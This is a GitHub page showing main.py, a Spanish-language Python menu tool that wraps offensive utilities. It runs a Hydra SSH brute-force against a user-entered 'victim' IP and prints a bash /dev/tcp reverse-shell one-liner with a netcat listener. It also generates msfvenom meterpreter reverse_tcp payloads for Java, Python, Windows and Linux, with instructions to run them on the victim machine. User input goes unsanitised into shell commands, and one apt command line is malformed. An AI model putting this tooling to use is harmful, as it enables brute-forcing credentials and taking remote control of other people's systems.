-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathmain.py
166 lines (145 loc) · 8.07 KB
/
main.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
from colorama import Fore, Back
import os, socket, sys
name = socket.gethostname()
ip= socket.gethostbyname(name)
BLACK = '\033[30m'
RED = '\033[31m'
GREEN = '\033[32m'
YELLOW = '\033[33m'
BLUE = '\033[34m'
MAGENTA = '\033[35m'
CYAN = '\033[36m'
WHITE = '\033[37m'
RESET = '\033[39m'
def hydra_attack():
options = '''
[00]: Volver al menú.
[01]: Salir.
[02]: Ataque ssh.
'''
print('\n' + options)
choice = input('[#]> ')
if choice == '00':
menu()
elif choice == '01':
print(Fore.RESET + Back.RESET)
os.system('clear')
sys.exit()
elif choice == '02':
print('\n[#] El diccionario tiene que estar en tu directorio actual.')
print('[#] Ingresa la IP de la víctima.')
choice = input('[#]> ')
print('\n' + '[#] Ingresa el nombre de usuario de la víctima.')
choice2 = input('[#]> ')
print('\n' + '[#] Ingresa el nombre del diccionario.')
choice3 = input('[#]> ')
print('[#]> ------------------------------------------------------------------------- <[#]')
os.system(f'hydra -l {choice2} -P {choice3} -e nsr -t 8 ssh://{choice}/ -V -f')
print('[#]> ------------------------------------------------------------------------- <[#]')
print('\n[#] Presiona ENTER para volver al menú.')
choice = input(Fore.YELLOW + Back.RESET + '\n[#]> ')
menu()
else:
print('\n[#] Error: Command not found :(. Presiona ENTER para volver al menú.')
choice = input(Fore.YELLOW + Back.RESET + '\n[#]> ')
menu()
def menu():
os.system('clear')
title = f'''
/%&@. [#] Aliado de Guerra (Kriegsverbündeter).
(.%(# [#] Usar siempre con responsabilidad y de acuerdo
#..&&#& con la licencia (https://github.com/ZombieGeeK0/MultiTool/blob/main/LICENSE.md).
#.,&&(@
#./&&#% [#] Esta es una herramienta multifunciones creada por ZombieGeek0.
#*.(&&##%
%*,(#%#%& [#] Ip: {ip}.
, /##*/% [#] Nombre de la máquina: {name}
, /##*/%
, /##//% [00]: Salir.
,, ,/(,*/# [01]: Volver al menú.
*, (##%///# [02]: Generar una wordlist con crunch (de palabras).
*, (##%//(# [03]: Poner al día todos los paquetes.
*, ###%//(# [04]: Hacerle un Whois a un dominio o a una IP.
*, .#%#%//(# [05]: Crear una pequeña reverse shell con Bash para Linux
*, .#%%%//(# [06]: Generar payloads con msfvenom.
*, .#%%%//(# [07]: Realizar ataques con Hydra.
*, .#%%%//(#
*, ..#%%%//(#
*. ..#%%%/((#
/. ..#%%%/((#
/. ..##%%(((#
/,..,##%%(((#
/,..,##%%(((#
/...,(#%%(((#
/...,##%%((##
/,..,##%%(#(#
(((/(#%%#%%&&
.,.../##/(#%(
'''
print(Fore.YELLOW + Back.RESET + title)
choice = input(Fore.YELLOW + Back.RESET + '\n[#]> ')
if choice == '00':
print(Fore.RESET + Back.RESET)
os.system('clear')
sys.exit()
elif choice == '01':
menu()
elif choice == '02':
print(Fore.YELLOW + Back.RESET + '\n[#] Ingresa la cantidad mínima de caracteres: ')
choice = input(Fore.YELLOW + Back.RESET + '[#]> ')
print(Fore.YELLOW + Back.RESET + '\n[#] Ingresa la cantidad máxima de caracteres: ')
choice2 = input(Fore.YELLOW + Back.RESET + '[#]> ')
print('[#]> ------------------------------------------------------------------------- <[#]')
os.system(f'crunch {choice} {choice2}')
print('[#]> ------------------------------------------------------------------------- <[#]')
print('\n[#] Presiona ENTER para volver al menú.')
choice = input(Fore.YELLOW + Back.RESET + '\n[#]> ')
menu()
elif choice == '03':
print('\n[#] En proceso...')
print('[#]> ------------------------------------------------------------------------- <[#]')
os.system('sudo apt update && sudo dist-upgrade -y && sudo apt autoremove .y && sudo apt update && sudo apt -y upgrade && sudo apt -y full-upgrade && sudo apt dist-upgrade')
os.system("alias fullupgrade='sudo apt update && sudo dist-upgrade -y && sudo apt autoremove .y && sudo apt update && sudo apt -y upgrade && sudo apt -y full-upgrade && sudo apt dist-upgrade'")
print('[#]> ------------------------------------------------------------------------- <[#]')
print('[#] A partir de ahora, usa el comando fullupgrade para actualizarlo todo.')
print('\n[#] Presiona ENTER para volver al menú.')
choice = input(Fore.YELLOW + Back.RESET + '\n[#]> ')
menu()
elif choice == '04':
print('\n[#] Ingresa el nombre de dominio o la IP.')
choice = input('[#]> ')
print('[#]> ------------------------------------------------------------------------- <[#]')
os.system(f'whois {choice}')
print('[#]> ------------------------------------------------------------------------- <[#]')
print('\n[#] Presiona ENTER para volver al menú.')
choice = input(Fore.YELLOW + Back.RESET + '\n[#]> ')
menu()
elif choice == '05':
print('\n[#] Comando a ejecutar en la víctima: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1')
print('[#]> ------------------------------------------------------------------------- <[#]')
os.system('nc -lvp 8080')
print('[#]> ------------------------------------------------------------------------- <[#]')
print('\n[#] Presiona ENTER para volver al menú.')
choice = input(Fore.YELLOW + Back.RESET + '\n[#]> ')
menu()
elif choice == '06':
print('\n[#] Ingresa tu IP: ')
choice = input('[#]> ')
print('[#]> ------------------------------------------------------------------------- <[#]')
os.system(f'msfvenom -p java/meterpreter/reverse_tcp LHOST={choice} LPORT=4444 -f jar > payload_java.jar')
os.system(f'msfvenom -p python/meterpreter/reverse_tcp LHOST={choice} LPORT=4444 -o payload_python.py')
os.system(f'msfvenom -p windows/meterpreter/reverse_tcp LHOST={choice} LPORT=4444 -o payload_windows.exe')
os.system(f'msfvenom -p linux/meterpreter/reverse_tcp LHOST={choice} LPORT=4444 -o payload_linux.exe')
print('[#]> ------------------------------------------------------------------------- <[#]')
print('[#] Ejecuta el archivo en la máquina víctima.')
os.system('nc -lvnp 4444')
print('\n[#] Presiona ENTER para volver al menú.')
choice = input(Fore.YELLOW + Back.RESET + '\n[#]> ')
menu()
elif choice == '07':
hydra_attack()
else:
print('\n[#] Error: Command not found :(. Presiona ENTER para volver al menú.')
choice = input(Fore.YELLOW + Back.RESET + '\n[#]> ')
menu()
menu()